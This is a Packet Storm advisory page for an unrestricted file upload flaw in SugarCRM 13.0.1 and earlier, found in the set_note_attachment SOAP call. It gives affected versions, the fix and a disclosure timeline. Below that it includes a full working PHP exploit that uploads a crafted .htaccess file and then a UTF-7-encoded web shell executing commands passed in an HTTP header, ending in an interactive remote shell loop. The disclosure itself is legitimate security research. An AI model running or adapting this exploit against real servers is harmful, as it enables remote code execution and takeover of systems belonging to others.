SugarCRM 13.0.1 Shell Upload

SugarCRM 13.0.1 Shell Upload: Posted Oct 27, 2023; Authored by EgiX | Site karmainsecurity.com; SugarCRM versions 13.0.1 and below suffer from a remote shell upload vulnerability in the set_note_attachment SOAP call.; tags | exploit, remote, shell; SHA-256 | f051a516487d8fd4a224aa9c883a0ab530f400da930805694f2f73cbeae5a487; Download | Favorite | View

SugarCRM 13.0.1 Shell Upload

-------------------------------------------------------------------------------
SugarCRM <= 13.0.1 (set_note_attachment) Unrestricted File Upload 
Vulnerability
-------------------------------------------------------------------------------


[-] Software Link:

https://www.sugarcrm.com


[-] Affected Versions:

Version 13.0.1 and prior versions.
Version 12.0.3 and prior versions.


[-] Vulnerability Description:

When handling the "set_note_attachment" SOAP call, the application 
allows uploading of
any kind of file into /upload/ directory. This one is protected by the 
main SugarCRM
.htaccess file, i.e. it doesn't allow access/execution of PHP files. 
However, this
behavior can be overridden if the subdirectory contains another 
.htaccess file.
So, an attacker can leverage the vulnerability to firstly upload a new 
.htaccess
file and then to upload the PHP code they want to execute.


[-] Proof of Concept:

https://karmainsecurity.com/pocs/KIS-2023-11.php

(Packet Storm note: POC included at bottom)

[-] Solution:

Upgrade to version 13.0.2, 12.0.4, or later.


[-] Disclosure Timeline:

[23/04/2023] - Vendor notified
[21/09/2023] - Fixed versions released
[06/10/2023] - CVE identifier requested
[26/10/2023] - Publication of this advisory


[-] CVE Reference:

The Common Vulnerabilities and Exposures project (cve.mitre.org)
has not assigned a CVE identifier for this vulnerability.


[-] Credits:

Vulnerability discovered by Egidio Romano.


[-] Original Advisory:

https://karmainsecurity.com/KIS-2023-11


[-] Other References:

https://support.sugarcrm.com/resources/security/sugarcrm-sa-2023-011/


--- KIS-2023-11.php poc ---


<?php

set_time_limit(0);
error_reporting(E_ERROR);

if (!extension_loaded("curl")) die("[+] cURL extension required!\n");

if ($argc != 4) die("Usage: php $argv[0] <URL> <username> <password>\n");

list($url, $user, $pass) = [$argv[1], $argv[2], $argv[3]];

print "[+] Logging in with username '{$user}' and password '{$pass}'\n";

$ch = curl_init();

$params = ["username" => $user, "password" => $pass, "grant_type" => "password", "client_id" => "sugar"];

curl_setopt($ch, CURLOPT_URL, "{$url}rest/v10/oauth2/token");
curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($params));
curl_setopt($ch, CURLOPT_HTTPHEADER, ["Content-Type: application/json"]);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);

if (($token = (json_decode(curl_exec($ch)))->access_token) == null) die("[+] Login failed!\n");

print "[+] Creating new Notes bean (ID: .htaccess)\n";

$note_id = ".htaccess";

curl_setopt($ch, CURLOPT_URL, "{$url}rest/v10/Notes");
curl_setopt($ch, CURLOPT_HTTPHEADER, ["Content-Type: application/json", "OAuth-Token: {$token}"]);
curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode(["id" => $note_id]));

if (!preg_match("/$note_id/", curl_exec($ch))) die("[+] Bean creation failed!\n");

print "[+] Creating new Notes bean (ID: sh.php)\n";

$note_id = "sh.php";

curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode(["id" => $note_id]));

if (!preg_match("/$note_id/", curl_exec($ch))) die("[+] Bean creation failed!\n");

require_once("./lib/nusoap.php");
$client = new nusoap_client("{$url}soap.php", false);

if (($err = $client->getError()))
{
  echo "\nConstructor error: $err";
  echo "\nDebug: " . $client->getDebug() . "\n";
  die();
}

print "[+] Sending SOAP login request\n";

$params = ["user_auth" => ["user_name" => $user, "password" => $pass]];
$session = $client->call('login', $params);

if ($session['id'] == -1) die("[+] SOAP login failed!\n");

print "[+] Uploading .htaccess through 'set_note_attachment'\n";

$htaccess = "RewriteEngine on\nRewriteBase /upload\nRewriteRule ^(.*)$ - [L]\nphp_flag zend.multibyte 1\nphp_value zend.script_encoding \"UTF-7\"";
$params = ["session" => $session['id'], "note" => ["id" => ".htaccess", "file" => base64_encode($htaccess)]];

$client->call("set_note_attachment", $params);

print "[+] Uploading shell through 'set_note_attachment'\n";

$shell = "+ADw?php passthru(\$_SERVER['HTTP_CMD']); ?>";
$params = ["session" => $session['id'], "note" => ["id" => "sh.php", "file" => base64_encode($shell)]];

$client->call("set_note_attachment", $params);

print "[+] Launching shell\n";

curl_setopt($ch, CURLOPT_URL, "{$url}upload/sh.php");

while(1)
{
    print "\nsugar-shell# ";
    if (($cmd = trim(fgets(STDIN))) == "exit") break;
    curl_setopt($ch, CURLOPT_HTTPHEADER, ["CMD: ".$cmd]);
    ($r = curl_exec($ch)) ? print $r : die("\n[+] Exploit failed!\n");
}

Top Authors In Last 30 Days

Red Hat 297 files
Ubuntu 66 files
Debian 33 files
Gentoo 28 files
LiquidWorm 10 files
nu11secur1ty 7 files
Adam Gowdiak 4 files
gabe_k 3 files
liquidsky 3 files
kai6u 3 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,036)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,495)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,567)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,739)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,489)
UNIX (9,397)
UnixWare (187)
Windows (6,656)
Other

SugarCRM 13.0.1 Shell Upload

SugarCRM 13.0.1 Shell Upload

File Archive:

May 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

SugarCRM 13.0.1 Shell Upload

Share This

SugarCRM 13.0.1 Shell Upload

File Archive:

May 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems